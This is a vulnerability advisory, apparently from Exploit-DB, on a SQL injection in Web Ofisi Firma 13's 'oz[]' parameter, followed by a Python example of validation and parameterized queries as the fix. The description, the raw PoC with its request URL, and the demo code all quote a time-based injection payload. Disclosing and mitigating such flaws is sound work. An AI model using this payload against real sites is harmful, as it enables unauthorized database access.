Vendor: Firma 13
By: Ahmet Ümit BAYRAM
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Firma 13
Affected Version From: v13
Affected Version To: v13
Patch Exists: NO
Related CWE: N/A
CPE: a:web_ofisi:firma_13
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2019

Web Ofisi Firma 13 – ‘oz’ SQL Injection

Web Ofisi Firma 13 is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this vulnerability to manipulate SQL queries by injecting arbitrary SQL code. The vulnerable parameter is 'oz[]' (GET). The payload used in the proof of concept is 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z, i.e. an expression that closes the quoted value and is evaluated by the database as part of the query.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in an unsafe manner. Parameterized queries should be used to prevent SQL injection attacks.
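The following is an added example, not code from the advisory or from Web Ofisi, showing the two mitigations above applied to an array filter parameter shaped like the request's oz[]=1_1: each value is checked against the expected <id>_<id> format, and the surviving values are bound as placeholders in an IN(...) clause instead of being concatenated into the query. The table and column names (urun_ozellik, urun_id, ozellik) and the sample rows are assumptions; sqlite3 stands in for whatever database the product uses.

```python
import re
import sqlite3

# Constructed sample data; the real product's schema is not on the page.
SCHEMA = """
CREATE TABLE urun_ozellik (urun_id INTEGER, ozellik TEXT);
INSERT INTO urun_ozellik VALUES (1, '1_1'), (2, '1_2'), (3, '1_1'), (3, '2_5');
"""

# The oz[] values in the advisory's request look like <digits>_<digits>
# (e.g. 1_1). Anything else is rejected before it reaches the query.
OZ_PATTERN = re.compile(r"^\d{1,10}_\d{1,10}$")


def is_valid_oz(value):
    """True if a single oz[] value has the expected <id>_<id> shape."""
    return bool(OZ_PATTERN.match(value))


def validate_oz(values):
    """Return the oz[] list unchanged, or raise on the first malformed value."""
    bad = [v for v in values if not is_valid_oz(v)]
    if bad:
        raise ValueError(f"rejected oz[] values: {bad}")
    return list(values)


def build_filter_query(values):
    """Build an IN(...) filter with one '?' per value; the SQL text never
    contains user input, the values travel separately as parameters."""
    placeholders = ", ".join("?" for _ in values)
    sql = ("SELECT DISTINCT urun_id FROM urun_ozellik "
           f"WHERE ozellik IN ({placeholders}) ORDER BY urun_id")
    return sql, tuple(values)


def products_for_oz(values):
    """Validate the oz[] list, then run the parameterized filter."""
    checked = validate_oz(values)
    if not checked:           # empty filter: nothing to match, skip the query
        return []
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    sql, params = build_filter_query(checked)
    rows = conn.execute(sql, params).fetchall()
    conn.close()
    return [row[0] for row in rows]


if __name__ == "__main__":
    print(products_for_oz(["1_1"]))          # [1, 3]
    print(products_for_oz(["1_2", "2_5"]))   # [2, 3]
    print(is_valid_oz("0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z"))  # False
```

Passing the advisory's payload as an oz[] value raises ValueError in validate_oz, and even a value that slipped past validation would only ever be compared as a string by the bound parameter.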

Exploit-DB raw data:

# Exploit Title: Web Ofisi Firma 13 - 'oz' SQL Injection
# Date: 2019-07-19
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://www.web-ofisi.com/detay/kurumsal-firma-v13-sinirsiz-dil.html
# Demo Site: http://demobul.net/firmav13/
# Version: v13
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----
Request: http://localhost/[PATH]/kategori/ikinci-el-klima.html?oz[]=1_1
Vulnerable Parameters: oz[] (GET)
Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z